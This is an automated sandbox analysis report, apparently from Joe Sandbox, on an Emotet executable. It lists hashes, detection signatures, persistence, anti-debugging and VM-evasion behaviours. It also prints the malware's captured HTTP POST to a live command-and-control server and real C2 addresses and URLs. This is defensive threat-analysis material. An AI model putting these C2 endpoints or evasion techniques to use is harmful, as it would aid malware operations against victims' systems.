Analysis Report JI93UWUR2p.exe

Overview

General Information

Sample Name: JI93UWUR2p.exe
Analysis ID: 318892
MD5: b2648f9f8ef41a5b1073afc1b5f70f7b
SHA1: d28b4602f1ae9bd282183761a3992c10515734d5
SHA256: 0b283e6ca397953eb86bb7842aa5ae2de6bb651c5e58349e839e1dbc304e96f8

Detection

Emotet
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: JI93UWUR2p.exe Avira: detected
Found malware configuration
Source: 00000000.00000002.648301312.0000000002180000.00000040.00000001.sdmp Malware Configuration Extractor: Emotet
Multi AV Scanner detection for submitted file
Source: JI93UWUR2p.exe Virustotal: Detection: 70%
Source: JI93UWUR2p.exe ReversingLabs: Detection: 89%
Antivirus or Machine Learning detection for unpacked file
Source: 0.0.JI93UWUR2p.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.ewy
Source: 1.0.winusb.exe.400000.0.unpack Avira: Label: TR/AD.Emotet.ewy

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_022121D0 CryptDuplicateHash,CryptDestroyHash,CryptGetHashParam,CryptEncrypt,GetProcessHeap,RtlAllocateHeap,memcpy,CryptExportKey, 1_2_022121D0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02212590 CryptCreateHash,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalFree,CryptGenKey,GetProcessHeap,HeapFree, 1_2_02212590
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02211F28 CryptDecrypt, 1_2_02211F28
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02211F10 CryptDecrypt,CryptDestroyHash,memcpy,CryptDuplicateHash,CryptVerifySignatureW,GetProcessHeap,HeapFree, 1_2_02211F10
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_021D38A0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_022138A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 1_2_022138A0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.4:49749 -> 186.189.249.2:80
Source: Traffic Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49763 -> 59.148.253.194:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49763 -> 59.148.253.194:8080
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 59.148.253.194 59.148.253.194
Source: Joe Sandbox View IP Address: 186.189.249.2 186.189.249.2
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HKBN-AS-APHongKongBroadbandNetworkLtdHK HKBN-AS-APHongKongBroadbandNetworkLtdHK
Source: Joe Sandbox View ASN Name: NSSSAAR NSSSAAR
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.4:49749 -> 186.189.249.2:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /VUesxvJLqsgRPBri0T/KPhOAHSN2kVSzn/bJeXeF1LVEmM6VM/fQdoG2HH9qeGa/plktldVlzb8csJM4Ibv/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------FHY8tOFpWJBZLSwMxRmYW9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4644Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 186.189.249.2
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02212940 GetProcessHeap,RtlAllocateHeap,InternetReadFile,GetProcessHeap,HeapFree,HttpQueryInfoW, 1_2_02212940
Source: unknown HTTP traffic detected: POST /VUesxvJLqsgRPBri0T/KPhOAHSN2kVSzn/bJeXeF1LVEmM6VM/fQdoG2HH9qeGa/plktldVlzb8csJM4Ibv/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------FHY8tOFpWJBZLSwMxRmYW9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4644Cache-Control: no-cache
Source: winusb.exe, 00000001.00000003.729797849.000000000290D000.00000004.00000001.sdmp String found in binary or memory: http://186.189.249.2/Wa57zPwBH2jYV/92TmuTyey/7gOYi9Zoit9x01Ipx9/APWTl0lAhKxUxI/G3oSW9PKXkWBEWzv/uGJr
Source: winusb.exe, 00000001.00000002.915417523.000000000290F000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/VUesxvJLqsgRPBri0T/KPhOAHSN2kVSzn/bJeXeF1LVEmM6VM/fQdoG2HH9qeGa/plktldVlz

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004137E2 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 0_2_004137E2
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_004137E2 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 1_2_004137E2

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 00000000.00000002.648301312.0000000002180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.914566076.0000000000650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.648328999.00000000021A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.914790785.00000000021E4000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Creates files inside the system directory
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File created: C:\Windows\SysWOW64\mstsc\
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File deleted: C:\Windows\SysWOW64\mstsc\winusb.exe:Zone.Identifier
Detected potential crypto function
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004150BB 0_2_004150BB
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004231CF 0_2_004231CF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041F1D8 0_2_0041F1D8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042D48E 0_2_0042D48E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041F5AC 0_2_0041F5AC
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042E60E 0_2_0042E60E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042D9D2 0_2_0042D9D2
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041F9B8 0_2_0041F9B8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042FCB1 0_2_0042FCB1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041ED03 0_2_0041ED03
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041FDD8 0_2_0041FDD8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0042DF16 0_2_0042DF16
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D8220 0_2_021D8220
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D7EA0 0_2_021D7EA0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D7640 0_2_021D7640
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D64C0 0_2_021D64C0
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D1B80 0_2_021D1B80
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02189A3E 0_2_02189A3E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218E02F 0_2_0218E02F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218805E 0_2_0218805E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021891DE 0_2_021891DE
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218371E 0_2_0218371E
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0219E74D 0_2_0219E74D
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218DFFB 0_2_0218DFFB
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218E4AF 0_2_0218E4AF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02189DBE 0_2_02189DBE
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218E5EA 0_2_0218E5EA
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_004150BB 1_2_004150BB
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_004231CF 1_2_004231CF
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041F1D8 1_2_0041F1D8
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0042D48E 1_2_0042D48E
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041F5AC 1_2_0041F5AC
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0042E60E 1_2_0042E60E
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0042D9D2 1_2_0042D9D2
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041F9B8 1_2_0041F9B8
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0042FCB1 1_2_0042FCB1
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041ED03 1_2_0041ED03
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041FDD8 1_2_0041FDD8
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0042DF16 1_2_0042DF16
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02218220 1_2_02218220
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02217640 1_2_02217640
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_022164C0 1_2_022164C0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02211B80 1_2_02211B80
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02217EA0 1_2_02217EA0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004203A0 appears 62 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004011C0 appears 58 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 0041E5AD appears 92 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 00419CA9 appears 109 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004031B0 appears 37 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 004033F0 appears 52 times
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: String function: 00418E47 appears 40 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 004203A0 appears 62 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 004011C0 appears 58 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 0041E5AD appears 92 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 00419CA9 appears 109 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 004031B0 appears 37 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 004033F0 appears 52 times
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: String function: 00418E47 appears 40 times
PE file contains strange resources
Source: JI93UWUR2p.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: JI93UWUR2p.exe, 00000000.00000002.649010856.0000000002A50000.00000002.00000001.sdmp Binary or memory string: originalfilename vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe, 00000000.00000002.649010856.0000000002A50000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe, 00000000.00000002.647975530.000000000044B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFormula.EXED vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe, 00000000.00000002.648891203.0000000002950000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs JI93UWUR2p.exe
Source: JI93UWUR2p.exe Binary or memory string: OriginalFilenameFormula.EXED vs JI93UWUR2p.exe
Source: classification engine Classification label: mal92.troj.evad.winEXE@3/0@0/3
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: OpenSCManagerW,CreateServiceW,_snwprintf,CloseServiceHandle,CloseServiceHandle, 0_2_021D87A0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02214C70 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,Process32FirstW,FindCloseChangeNotification, 1_2_02214C70
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041611C FindResourceA,LoadResource,LockResource,FreeResource, 0_2_0041611C
Source: JI93UWUR2p.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: JI93UWUR2p.exe Virustotal: Detection: 70%
Source: JI93UWUR2p.exe ReversingLabs: Detection: 89%
Source: JI93UWUR2p.exe Virustotal: Detection: 70%
Source: JI93UWUR2p.exe ReversingLabs: Detection: 89%
Source: unknown Process created: C:\Users\user\Desktop\JI93UWUR2p.exe 'C:\Users\user\Desktop\JI93UWUR2p.exe'
Source: unknown Process created: C:\Windows\SysWOW64\mstsc\winusb.exe C:\Windows\SysWOW64\mstsc\winusb.exe
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Process created: C:\Windows\SysWOW64\mstsc\winusb.exe C:\Windows\SysWOW64\mstsc\winusb.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\JI93UWUR2p.exe 'C:\Users\user\Desktop\JI93UWUR2p.exe'
Source: unknown Process created: C:\Windows\SysWOW64\mstsc\winusb.exe C:\Windows\SysWOW64\mstsc\winusb.exe
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Process created: C:\Windows\SysWOW64\mstsc\winusb.exe C:\Windows\SysWOW64\mstsc\winusb.exe Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: JI93UWUR2p.exe Static PE information: section name: RT_CURSOR
Source: JI93UWUR2p.exe Static PE information: section name: RT_BITMAP
Source: JI93UWUR2p.exe Static PE information: section name: RT_ICON
Source: JI93UWUR2p.exe Static PE information: section name: RT_MENU
Source: JI93UWUR2p.exe Static PE information: section name: RT_DIALOG
Source: JI93UWUR2p.exe Static PE information: section name: RT_STRING
Source: JI93UWUR2p.exe Static PE information: section name: RT_ACCELERATOR
Source: JI93UWUR2p.exe Static PE information: section name: RT_GROUP_ICON
Source: JI93UWUR2p.exe Static PE information: section name: RT_CURSOR
Source: JI93UWUR2p.exe Static PE information: section name: RT_BITMAP
Source: JI93UWUR2p.exe Static PE information: section name: RT_ICON
Source: JI93UWUR2p.exe Static PE information: section name: RT_MENU
Source: JI93UWUR2p.exe Static PE information: section name: RT_DIALOG
Source: JI93UWUR2p.exe Static PE information: section name: RT_STRING
Source: JI93UWUR2p.exe Static PE information: section name: RT_ACCELERATOR
Source: JI93UWUR2p.exe Static PE information: section name: RT_GROUP_ICON
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: JI93UWUR2p.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004024D0 LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_004024D0
PE file contains an invalid checksum
Source: JI93UWUR2p.exe Static PE information: real checksum: 0x979a0 should be: 0x93829
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004203E5 push ecx; ret 0_2_004203F8
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041E685 push ecx; ret 0_2_0041E698
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5E20 push ecx; mov dword ptr [esp], 0000EDA0h 0_2_021D5E21
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5E50 push ecx; mov dword ptr [esp], 00007A5Dh 0_2_021D5E51
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5E80 push ecx; mov dword ptr [esp], 0000C40Ah 0_2_021D5E81
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5EE0 push ecx; mov dword ptr [esp], 00000AC6h 0_2_021D5EE1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5F40 push ecx; mov dword ptr [esp], 0000E5DEh 0_2_021D5F41
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5F70 push ecx; mov dword ptr [esp], 0000E7B9h 0_2_021D5F71
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5FC0 push ecx; mov dword ptr [esp], 0000E566h 0_2_021D5FC1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5D30 push ecx; mov dword ptr [esp], 000012E8h 0_2_021D5D31
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5D70 push ecx; mov dword ptr [esp], 00008FD2h 0_2_021D5D71
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5DA0 push ecx; mov dword ptr [esp], 00005C85h 0_2_021D5DA1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D5DD0 push ecx; mov dword ptr [esp], 0000F574h 0_2_021D5DD1
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187A1E push ecx; mov dword ptr [esp], 0000C40Ah 0_2_02187A1F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187A7E push ecx; mov dword ptr [esp], 00000AC6h 0_2_02187A7F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187ADE push ecx; mov dword ptr [esp], 0000E5DEh 0_2_02187ADF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187B0E push ecx; mov dword ptr [esp], 0000E7B9h 0_2_02187B0F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_02187B5E push ecx; mov dword ptr [esp], 0000E566h 0_2_02187B5F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021878CE push ecx; mov dword ptr [esp], 000012E8h 0_2_021878CF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218790E push ecx; mov dword ptr [esp], 00008FD2h 0_2_0218790F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218793E push ecx; mov dword ptr [esp], 00005C85h 0_2_0218793F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0218796E push ecx; mov dword ptr [esp], 0000F574h 0_2_0218796F
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021879BE push ecx; mov dword ptr [esp], 0000EDA0h 0_2_021879BF
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021879EE push ecx; mov dword ptr [esp], 00007A5Dh 0_2_021879EF
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_004203E5 push ecx; ret 1_2_004203F8
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_0041E685 push ecx; ret 1_2_0041E698
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02215E20 push ecx; mov dword ptr [esp], 0000EDA0h 1_2_02215E21
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02215E50 push ecx; mov dword ptr [esp], 00007A5Dh 1_2_02215E51
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02215E80 push ecx; mov dword ptr [esp], 0000C40Ah 1_2_02215E81
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02215EE0 push ecx; mov dword ptr [esp], 00000AC6h 1_2_02215EE1
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_02215F70 push ecx; mov dword ptr [esp], 0000E7B9h 1_2_02215F71

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Executable created and started: C:\Windows\SysWOW64\mstsc\winusb.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe PE file moved: C:\Windows\SysWOW64\mstsc\winusb.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File opened: C:\Windows\SysWOW64\mstsc\winusb.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_00410F66 IsIconic,GetWindowPlacement,GetWindowRect, 0_2_00410F66
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_00410F66 IsIconic,GetWindowPlacement,GetWindowRect, 1_2_00410F66
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\JI93UWUR2p.exe API coverage: 9.5 %
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\JI93UWUR2p.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_021D38A0
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Code function: 1_2_022138A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 1_2_022138A0
Source: winusb.exe, 00000001.00000002.915399663.0000000002900000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW M{%SystemRoot%\system32\mswsock.dll
Source: winusb.exe, 00000001.00000002.915417523.000000000290F000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\JI93UWUR2p.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\mstsc\winusb.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\mstsc\winusb.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004024D0 LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_004024D0
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_0041D41B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041D41B
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_004024D0 LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_004024D0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\JI93UWUR2p.exe Code function: 0_2_021D3ED0 mov eax, dword ptr fs:[00000030h] 0_2_021D3ED0
